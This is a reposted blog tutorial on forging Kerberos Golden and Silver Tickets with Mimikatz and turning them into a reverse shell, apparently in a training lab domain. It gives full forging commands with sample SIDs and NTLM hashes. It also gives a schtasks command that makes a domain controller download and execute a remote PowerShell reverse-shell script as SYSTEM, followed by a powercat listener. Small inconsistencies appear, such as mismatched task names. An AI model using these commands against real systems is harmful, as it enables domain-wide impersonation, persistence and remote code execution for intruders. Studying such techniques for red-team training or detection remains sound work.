Golden/Silver Ticket

Post taken from https://medium.com/@mohnishdhage/how-to-get-a-reverse-shell-from-golden-silver-ticket-without-metasploit-52a9fc279e32

Golden/Silver Ticket without Metasploit

Golden Ticket

Golden Ticket is a persistence mechanism, it is signed and encrypted with NTLM hash of krbtgt account. In simple words, Golden Ticket is a valid Ticket Granting Ticket(TGT) used to obtain access to different services. We can use the Golden Ticket to impersonate any user in the domain.

Once you get the NTLM hash of krbtgt account we can use the following Mimikatz command to get a Golden Ticket (We need to run this as a local admin as we will be writing to LSASS process):

Invoke-Mimikatz -Command ‘“kerberos::golden /User:Administrator /domain:somedomainname.local /sid:S-1–5–21–1874506631–3219951593–538509811 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt”’

kerberos::golden — Name of the Mimikatz Module

user — Name of the user for whom we are requesting the TGT (doesn’t need to be a valid name as account validation is not done by the DC until TGT is older than 20 mins)

domain — Name of the target domain

sid — Domain SID (You can use the command Get-DomainSID from PowerView to get this)

krbtgt — NTLM hash of the krbtgt account

id & group —User and Group RID(Optional parameter)

ptt — Inject the ticket into current PowerShell Session (we can use /ticket to save the ticket for later use)

startoffset — When will the ticket be available in minutes(0- right now)(Optional parameter)

endin — Lifetime of ticket in minutes(Optional parameter)

renewmax — Ticket lifetime with renewal in minutes (Optional parameter)

To check if the ticket was created, we can use the following command:

klist

Silver Ticket

A Silver Ticket on the other hand is a valid Ticket Granting Service(TGS) which is encrypted using the NTLM hash of a service account. Silver Ticket can only be used to access the service with who’s NTLM hash it is encrypted with. Silver Ticket attack is very quite in terms of the logs left behind but at the same time provides limited access.

Once we have the NTLM hash of a target service we can use the following command to request for Silver Ticket:

Invoke-Mimikatz -Command ‘“kerberos::golden /domain:somedomainname.local /sid:S-1–5–21–1874506631–3219951593–538509811 /target:dc.somedomainname.local /service:HOST /rc4:731a06658bc10b59d71f5776e93e5689 /user:Administrator /ptt”’

The Mimikatz module used here is still kerberos::golden, there is no silver module.

service — the SPN name of service for which we are requesting TGS

rc4 — NTLM hash of target service account

Note: We need a TGS for HOST service in order to schedule task on the target server(required to a get reverse shell from Silver Ticket).

Getting Reverse Shell

Step 1: Schedule a weekly task to fetch reverse shell script.

schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU “NT Authority\SYSTEM” /TN “ABC” /TR “powershell.exe -c ‘ iex (iwr http://172.16.100.14/Invoke-PowerShellTcp.ps1 -UseBasicParsing)’”

Note: Make sure you are calling the function within the script and have proper IP and port number configured (Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.14 -Port 1024). And the file is host :P

S — Name of the computer on which the task is to be scheduled

SC — Schedule type

RU — User used to create and execute the task

TN — Name of the task

TR — specify the command to run when the task is running

Step 2: Start a listener

powercat -l -p 443 -v -t 1000

p — port to listen on

t — timeout

Step 3: Run the scheduled task.

schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN “User14”

Reference: